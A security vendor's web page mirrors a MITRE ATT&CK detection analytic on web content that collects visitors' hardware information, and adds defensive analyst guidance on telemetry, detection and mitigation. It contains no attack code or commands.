Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN2019: Analytic 2019

Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.[1][2] Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

EnterpriseAN2019AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This analytic is about the difficulty of finding internet-facing content that may collect visitors’ host hardware information, such as reconnaissance frameworks used in watering-hole style activity. For leaders, the practical issue is not a single alert rule; it is whether the organization has visibility into pre-compromise exposure and related initial-access indicators when the suspicious activity may occur outside normal enterprise telemetry.

Executive priority

Treat this as a visibility and readiness question. Because ATT&CK notes high occurrence, high false-positive potential, and activity that may happen outside the target organization’s view, executives should ask whether threat intelligence, external attack surface monitoring, web telemetry, and incident response processes can connect suspicious external infrastructure or web content to later initial-access risk. This can inform budget decisions around managed detection, threat intelligence, and external exposure monitoring, but the supplied object does not support claims of guaranteed detection or specific business impact.

Technical view

SOC and detection teams should validate whether they collect evidence relevant to externally hosted malicious or suspicious web content that collects visitor hardware information. Since no official detection logic is provided and the platform is PRE, coverage should focus on correlation and triage rather than a standalone high-confidence alert. Useful validation includes checking whether external web scanning results, threat intelligence reports, proxy/DNS/web access logs, and incident timelines can be tied to related stages such as Initial Access, as ATT&CK suggests.

Likely telemetry

  • External attack surface or internet scanning results for suspicious web content patterns
  • Threat intelligence reporting on infrastructure and watering-hole style reconnaissance frameworks
  • Web proxy, secure web gateway, or browser access logs showing visits to suspicious pages
  • DNS resolution logs for domains linked to suspicious infrastructure
  • Web server/referrer telemetry where the organization controls potentially affected web properties

Detection direction

  • Do not rely on a single signature alone; ATT&CK states this activity may have very high occurrence and false positives.
  • Prioritize enrichment and correlation with domain reputation, infrastructure context, web access patterns, and subsequent Initial Access evidence.
  • Validate whether the organization has visibility into activity that may occur outside its environment; if not, document the blind spot rather than overstating coverage.
  • Tune detections to separate broad internet noise from content or infrastructure that is relevant to the organization’s users, partners, or exposed web assets.
  • Use analyst review for context-heavy findings because the official object provides no detection procedure or tactic mapping.

Mitigation priorities

  • Establish or validate external visibility sources such as threat intelligence and attack surface monitoring before treating this as a SOC-only detection problem.
  • Ensure proxy, DNS, and web access logging are retained long enough to support incident response correlation when suspicious infrastructure is identified.
  • Create triage playbooks that connect suspicious web content findings to user exposure review and Initial Access investigation paths.
  • Where organization-owned web properties are involved, coordinate web security review, content integrity checks, and incident response handling.
  • Document known visibility gaps for compliance and risk reporting, especially where suspicious activity occurs outside enterprise-controlled telemetry.
Analyst notes and limits

The object is a detection analytic, not a technique, and includes no official detection logic, no tactic mapping, and no relationships. The strongest defensible interpretation is that this analytic highlights a hard-to-detect pre-compromise reconnaissance or exposure pattern involving malicious content that may collect hardware information from visitors.

This take is limited to the supplied ATT&CK fields and references. It does not establish active exploitation, attribution, affected organizations, specific tools in current use, or detection coverage. Local telemetry, web exposure, user browsing patterns, and threat intelligence sources are required to determine operational relevance.

Official MITRE ATT&CK definition

Analytic 2019

Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.[1][2] Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
f0bf3a47e1b45a9a...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle f0bf3a47e1b4…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    ThreatConnect Infrastructure Dec 2020

    ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.

    Open source URL
  2. [2]
    ATT ScanBox

    Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.

    Open source URL
  3. [3]
    mitre-attack AN2019
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use